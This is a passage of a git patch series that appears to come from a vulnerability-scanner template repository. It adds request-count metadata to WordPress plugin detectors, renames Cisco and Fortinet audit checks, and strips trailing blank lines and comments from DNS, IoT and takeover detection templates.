422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From fff75636b82ccc72bc449ba987f85fb35414c292 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:49:46 +0530 Subject: [PATCH 397/609] Update disable-ip-source-route.yaml --- file/audit/cisco/disable-ip-source-route.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml index 3fe98d5ed6..64aaf462d6 100644 --- a/file/audit/cisco/disable-ip-source-route.yaml +++ b/file/audit/cisco/disable-ip-source-route.yaml @@ -1,7 +1,7 @@ id: disable-ip-source-route info: - name: Cisco IP Source-Route - Detect + name: Cisco Disable IP Source-Route - Detect author: pussycat0x severity: info description: | @@ -29,5 +29,3 @@ file: - type: word words: - "configure terminal" - -# Enhanced by md on 2023/05/03 From f3086fa7feed6577de111edb074d67b8298b693e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:50:38 +0530 Subject: [PATCH 398/609] Update disable-pad-service.yaml --- file/audit/cisco/disable-pad-service.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml index 75b9a336eb..db95facb05 100644 --- a/file/audit/cisco/disable-pad-service.yaml +++ b/file/audit/cisco/disable-pad-service.yaml @@ -1,7 +1,7 @@ id: disable-pad-service info: - name: Cisco PAD - Detect + name: Cisco Disable PAD - Detect author: pussycat0x severity: info description: | @@ -28,5 +28,3 @@ file: - type: word words: - "configure terminal" - -# Enhanced by md on 2023/05/03 From 198de36ff7aeb637b0456b09088bd78105d4a4fe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:51:14 +0530 Subject: [PATCH 399/609] Update logging-enable.yaml --- file/audit/cisco/logging-enable.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml index 9d4a26916b..c1641a7ff4 100644 --- a/file/audit/cisco/logging-enable.yaml +++ b/file/audit/cisco/logging-enable.yaml @@ -1,7 +1,7 @@ id: logging-enable info: - name: Cisco Logging - Detect + name: Cisco Logging Enable - Detect author: pussycat0x severity: info description: | From ee3726735e66476d3aebea5896d2a46972f00397 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:51:57 +0530 Subject: [PATCH 400/609] Update auto-usb-install.yaml --- file/audit/fortigate/auto-usb-install.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/audit/fortigate/auto-usb-install.yaml b/file/audit/fortigate/auto-usb-install.yaml index 4f29327cad..7c2c04c328 100644 --- a/file/audit/fortigate/auto-usb-install.yaml +++ b/file/audit/fortigate/auto-usb-install.yaml @@ -1,7 +1,7 @@ id: auto-usb-install info: - name: Fortinet Auto USB Installation - Detect + name: Fortinet Auto USB Installation Enabled - Detect author: pussycat0x severity: info description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. From 34b52ff2a9204276e712b71ac7e5e5a035e975a9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:52:54 +0530 Subject: [PATCH 401/609] Update heuristic-scan.yaml --- file/audit/fortigate/heuristic-scan.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml index 865d16516a..f7892f0503 100644 --- a/file/audit/fortigate/heuristic-scan.yaml +++ b/file/audit/fortigate/heuristic-scan.yaml @@ -1,7 +1,7 @@ id: heuristic-scan info: - name: Fortinet Heuristic Scanning Configuration - Detect + name: Fortinet Heuristic Scanning not Configured - Detect author: pussycat0x severity: info description: | From 58b5e117042b90c6f721898eda908b434c39e49f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:53:49 +0530 Subject: [PATCH 402/609] Update inactivity-timeout.yaml --- file/audit/fortigate/inactivity-timeout.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/audit/fortigate/inactivity-timeout.yaml b/file/audit/fortigate/inactivity-timeout.yaml index 7bc9344045..2f8cff9b04 100644 --- a/file/audit/fortigate/inactivity-timeout.yaml +++ b/file/audit/fortigate/inactivity-timeout.yaml @@ -1,7 +1,7 @@ id: inactivity-timeout info: - name: Fortinet Inactivity Timeout - Detect + name: Fortinet Inactivity Timeout Not Implemented - Detect author: pussycat0x severity: info description: If Fortinet inactivity timeout functionality is disabled, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations within that window if the administrator is away from the computer. From 3fdd9568e7e0d91d87e535c9674eb76f50cf5d88 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:54:44 +0530 Subject: [PATCH 403/609] Update electron-version-detect.yaml --- file/electron/electron-version-detect.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index 705e2b1b5c..ff8b931059 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -1,11 +1,9 @@ id: electron-version-detect info: - name: Google Chromium/Electron - Remote Code Execution + name: Electron Version - Detect author: me9187 severity: info - description: Google Chromium contains a remote code execution vulnerability which affects all recent versions of Electron. Any Electron app that accesses remote content is vulnerable to this exploit, regardless of whether the sandbox option is enabled. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - remediation: Update to Electron 1.7.8 or 1.6.14, both of which include a fix for this vulnerability. reference: - https://www.electronjs.org/blog/chromium-rce-vulnerability/ classification: @@ -22,5 +20,3 @@ file: - type: regex regex: - '"electronVersion":"[^"]*"' - -# Enhanced by md on 2023/05/03 From ac0204bfe185d2366e37449d4305a854386350c5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:56:14 +0530 Subject: [PATCH 404/609] Update maintainer-account.yaml --- file/audit/fortigate/maintainer-account.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/file/audit/fortigate/maintainer-account.yaml b/file/audit/fortigate/maintainer-account.yaml index 8c90e09c84..e5e68eb21d 100644 --- a/file/audit/fortigate/maintainer-account.yaml +++ b/file/audit/fortigate/maintainer-account.yaml @@ -1,7 +1,7 @@ id: maintainer-account info: - name: Fortinet Maintainer Account - Detect + name: Fortinet Maintainer Account Not Implemented - Detect author: pussycat0x severity: info description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI. @@ -29,5 +29,3 @@ file: - "config router" - "config firewall" condition: or - -# Enhanced by md on 2023/05/03 From 0ddaa3f5e7e459b95d20d1a7378a6788cc2ff977 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:56:57 +0530 Subject: [PATCH 405/609] Update password-policy.yaml --- file/audit/fortigate/password-policy.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/file/audit/fortigate/password-policy.yaml b/file/audit/fortigate/password-policy.yaml index d49f8f0ed1..da49fa8759 100644 --- a/file/audit/fortigate/password-policy.yaml +++ b/file/audit/fortigate/password-policy.yaml @@ -1,7 +1,7 @@ id: password-policy info: - name: Fortinet Password Policy - Detect + name: Fortinet Password Policy Not Set - Detect author: pussycat0x severity: info description: Fortinet administrative password policy is not set. Using this feature is recommended to ensure all administrators use secure passwords that meet organizations' requirements. @@ -29,5 +29,3 @@ file: - "config router" - "config firewall" condition: or - -# Enhanced by md on 2023/05/03 From bde228320ff6ab83fc30909a6936e7a1396f3b92 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:57:29 +0530 Subject: [PATCH 406/609] Update remote-auth-timeout.yaml --- file/audit/fortigate/remote-auth-timeout.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/file/audit/fortigate/remote-auth-timeout.yaml b/file/audit/fortigate/remote-auth-timeout.yaml index 27396f4c11..8b5acdac4d 100644 --- a/file/audit/fortigate/remote-auth-timeout.yaml +++ b/file/audit/fortigate/remote-auth-timeout.yaml @@ -1,7 +1,7 @@ id: remote-auth-timeout info: - name: Fortinet Remote Authentication Timeout - Detect + name: Fortinet Remote Authentication Timeout Not Set - Detect author: pussycat0x severity: info description: Fortinet remote authentication timeout functionality is recommended to be enabled. Lack of a set timeout can allow an attacker to act within that threshold if the administrator is away from the computer, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. @@ -30,5 +30,3 @@ file: - "config router" - "config firewall" condition: or - -# Enhanced by md on 2023/05/04 From cfbd8a11d251bcaf1afaec30d5608b2a8a8d775a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:58:28 +0530 Subject: [PATCH 407/609] Update scp-admin.yaml --- file/audit/fortigate/scp-admin.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/file/audit/fortigate/scp-admin.yaml b/file/audit/fortigate/scp-admin.yaml index 32f00ee762..8d862f8944 100644 --- a/file/audit/fortigate/scp-admin.yaml +++ b/file/audit/fortigate/scp-admin.yaml @@ -1,7 +1,7 @@ id: scp-admin info: - name: Fortinet Admin-SCP - Detect + name: Fortinet Admin-SCP Disabled - Detect author: pussycat0x severity: info description: Fortinet Admin-SCP functionality is recommended to be disabled by default. Enabling SCP allows download of the configuration file from the FortiGate as an alternative method of backing up the configuration file. @@ -29,5 +29,3 @@ file: - "config router" - "config firewall" condition: or - -# Enhanced by md on 2023/05/04 From 82148433c3afb4e43c610ec838a0be2c8d424704 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 11:24:47 +0530 Subject: [PATCH 408/609] Fix Empty Lines --- dns/azure-takeover-detection.yaml | 2 -- dns/detect-dangling-cname.yaml | 4 +--- dns/dmarc-detect.yaml | 4 +--- dns/dns-waf-detect.yaml | 4 +--- dns/dnssec-detection.yaml | 4 +--- dns/ec2-detection.yaml | 4 +--- dns/elasticbeantalk-takeover.yaml | 4 +--- dns/mx-fingerprint.yaml | 4 +--- dns/mx-service-detector.yaml | 4 +--- dns/nameserver-fingerprint.yaml | 4 +--- dns/ptr-fingerprint.yaml | 4 +--- dns/servfail-refused-hosts.yaml | 4 +--- dns/spoofable-spf-records-ptr.yaml | 4 +--- dns/txt-fingerprint.yaml | 4 +--- dns/worksites-detection.yaml | 4 +--- file/android/adb-backup-enabled.yaml | 4 +--- file/electron/node-integration-enabled.yaml | 4 +--- file/logs/python-app-sql-exceptions.yaml | 4 +--- file/logs/suspicious-sql-error-messages.yaml | 4 +--- file/xss/dom-xss.yaml | 4 +--- headless/headless-open-redirect.yaml | 4 +--- headless/window-name-domxss.yaml | 4 +--- http/cnvd/2018/CNVD-2018-13393.yaml | 4 +--- http/cnvd/2019/CNVD-2019-01348.yaml | 4 +--- http/cnvd/2019/CNVD-2019-06255.yaml | 4 +--- http/cnvd/2019/CNVD-2019-19299.yaml | 4 +--- http/cnvd/2019/CNVD-2019-32204.yaml | 4 +--- http/cnvd/2020/CNVD-2020-23735.yaml | 4 +--- http/cnvd/2020/CNVD-2020-26585.yaml | 4 +--- http/cnvd/2020/CNVD-2020-46552.yaml | 4 +--- http/cnvd/2020/CNVD-2020-56167.yaml | 4 +--- http/cnvd/2020/CNVD-2020-62422.yaml | 4 +--- http/cnvd/2020/CNVD-2020-67113.yaml | 4 +--- http/cnvd/2020/CNVD-2020-68596.yaml | 4 +--- http/cnvd/2021/CNVD-2021-01931.yaml | 4 +--- http/exposed-panels/ems-login-panel.yaml | 4 +--- http/exposed-panels/gnu-mailman.yaml | 4 +--- http/exposed-panels/mystrom-panel.yaml | 4 +--- http/exposed-panels/nginx-proxy-manager.yaml | 4 +--- http/exposed-panels/octoprint-login.yaml | 4 +--- http/iot/apc-ups-login.yaml | 4 +--- http/iot/contacam.yaml | 5 ++--- http/iot/envision-gateway.yaml | 4 +--- http/iot/epmp-login.yaml | 4 +--- http/iot/heatmiser-wifi-thermostat.yaml | 4 +--- http/iot/hp-laserjet-detect.yaml | 4 +--- http/iot/internet-service.yaml | 4 +--- http/iot/iotawatt-app-exposure.yaml | 4 +--- http/iot/liveview-axis-camera.yaml | 4 +--- http/iot/mobotix-guest-camera.yaml | 5 ++--- http/iot/netsurveillance-web.yaml | 4 +--- http/iot/novus-ip-camera.yaml | 4 +--- http/iot/nuuno-network-login.yaml | 4 +--- http/iot/octoprint-3dprinter-detect.yaml | 4 +--- http/iot/routeros-login.yaml | 4 +--- http/iot/targa-camera-lfi.yaml | 4 +--- http/iot/webcamxp-5.yaml | 4 +--- http/takeovers/aftership-takeover.yaml | 4 +--- http/takeovers/agilecrm-takeover.yaml | 4 +--- http/takeovers/aha-takeover.yaml | 4 +--- 60 files changed, 61 insertions(+), 179 deletions(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index d8405b067f..a04bef1ba5 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -54,5 +54,3 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" - - diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 8d38c5bc62..f9676a5946 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -34,6 +34,4 @@ dns: - type: regex group: 1 regex: - - "IN\tCNAME\t(.+)" - - + - "IN\tCNAME\t(.+)" \ No newline at end of file diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index 703c5677ee..0c7b785f67 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -25,6 +25,4 @@ dns: - type: regex group: 1 regex: - - "IN\tTXT\t(.+)" - - + - "IN\tTXT\t(.+)" \ No newline at end of file diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 49e608fa08..02c447486f 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -168,6 +168,4 @@ dns: - type: word name: edns words: - - ".iidns.com" - - + - ".iidns.com" \ No newline at end of file diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index 7e723d2af9..f9007a6eb5 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -21,6 +21,4 @@ dns: matchers: - type: regex regex: - - "IN\tDS\t(.+)" - - + - "IN\tDS\t(.+)" \ No newline at end of file diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index fd76e0fc85..d120c45b06 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -21,6 +21,4 @@ dns: - type: regex regex: - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" - - + - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" \ No newline at end of file diff --git a/dns/elasticbeantalk-takeover.yaml b/dns/elasticbeantalk-takeover.yaml index b650827729..c56af4d8fe 100644 --- a/dns/elasticbeantalk-takeover.yaml +++ b/dns/elasticbeantalk-takeover.yaml @@ -46,6 +46,4 @@ dns: - type: regex group: 1 regex: - - "IN\tCNAME\t(.+)" - - + - "IN\tCNAME\t(.+)" \ No newline at end of file diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml index 338d5338a5..24808c1e14 100644 --- a/dns/mx-fingerprint.yaml +++ b/dns/mx-fingerprint.yaml @@ -27,6 +27,4 @@ dns: - type: regex group: 1 regex: - - "IN\tMX\t(.+)" - - + - "IN\tMX\t(.+)" \ No newline at end of file diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index f09fb548b3..dcf4e9b712 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -80,6 +80,4 @@ dns: name: "Proofpoint US" words: - "mx1-us1.ppe-hosted.com" - - "mx2-us1.ppe-hosted.com" - - + - "mx2-us1.ppe-hosted.com" \ No newline at end of file diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml index 815ab7246f..d08362e0bd 100644 --- a/dns/nameserver-fingerprint.yaml +++ b/dns/nameserver-fingerprint.yaml @@ -24,6 +24,4 @@ dns: - type: regex group: 1 regex: - - "IN\tNS\t(.+)" - - + - "IN\tNS\t(.+)" \ No newline at end of file diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml index 869efa1051..0861364501 100644 --- a/dns/ptr-fingerprint.yaml +++ b/dns/ptr-fingerprint.yaml @@ -24,6 +24,4 @@ dns: - type: regex group: 1 regex: - - "IN\tPTR\t(.+)" - - + - "IN\tPTR\t(.+)" \ No newline at end of file diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index ed2f9a84e1..87ed12bcf8 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -20,6 +20,4 @@ dns: - type: word words: - "SERVFAIL" - - "REFUSED" - - + - "REFUSED" \ No newline at end of file diff --git a/dns/spoofable-spf-records-ptr.yaml b/dns/spoofable-spf-records-ptr.yaml index 365e9d4960..6b99404335 100644 --- a/dns/spoofable-spf-records-ptr.yaml +++ b/dns/spoofable-spf-records-ptr.yaml @@ -22,6 +22,4 @@ dns: words: - "v=spf1" - " ptr " - condition: and - - + condition: and \ No newline at end of file diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml index 50a0d5e76c..02e5f12700 100644 --- a/dns/txt-fingerprint.yaml +++ b/dns/txt-fingerprint.yaml @@ -26,6 +26,4 @@ dns: - type: regex group: 1 regex: - - "IN\tTXT\t(.+)" - - + - "IN\tTXT\t(.+)" \ No newline at end of file diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml index e3e46d27c9..4122359917 100644 --- a/dns/worksites-detection.yaml +++ b/dns/worksites-detection.yaml @@ -20,6 +20,4 @@ dns: matchers: - type: word words: - - "69.164.223.206" - - + - "69.164.223.206" \ No newline at end of file diff --git a/file/android/adb-backup-enabled.yaml b/file/android/adb-backup-enabled.yaml index 2988be2c39..f35f8e7d5a 100644 --- a/file/android/adb-backup-enabled.yaml +++ b/file/android/adb-backup-enabled.yaml @@ -18,6 +18,4 @@ file: matchers: - type: word words: - - "android:allowBackup=\"true\"" - - + - "android:allowBackup=\"true\"" \ No newline at end of file diff --git a/file/electron/node-integration-enabled.yaml b/file/electron/node-integration-enabled.yaml index f4eff5cb00..c9ccd8598a 100644 --- a/file/electron/node-integration-enabled.yaml +++ b/file/electron/node-integration-enabled.yaml @@ -19,6 +19,4 @@ file: - type: word words: - - "nodeIntegration: true" - - + - "nodeIntegration: true" \ No newline at end of file diff --git a/file/logs/python-app-sql-exceptions.yaml b/file/logs/python-app-sql-exceptions.yaml index c6b60ab84a..639c971f66 100644 --- a/file/logs/python-app-sql-exceptions.yaml +++ b/file/logs/python-app-sql-exceptions.yaml @@ -22,6 +22,4 @@ file: - 'DataError' - 'IntegrityError' - 'ProgrammingError' - - 'OperationalError' - - + - 'OperationalError' \ No newline at end of file diff --git a/file/logs/suspicious-sql-error-messages.yaml 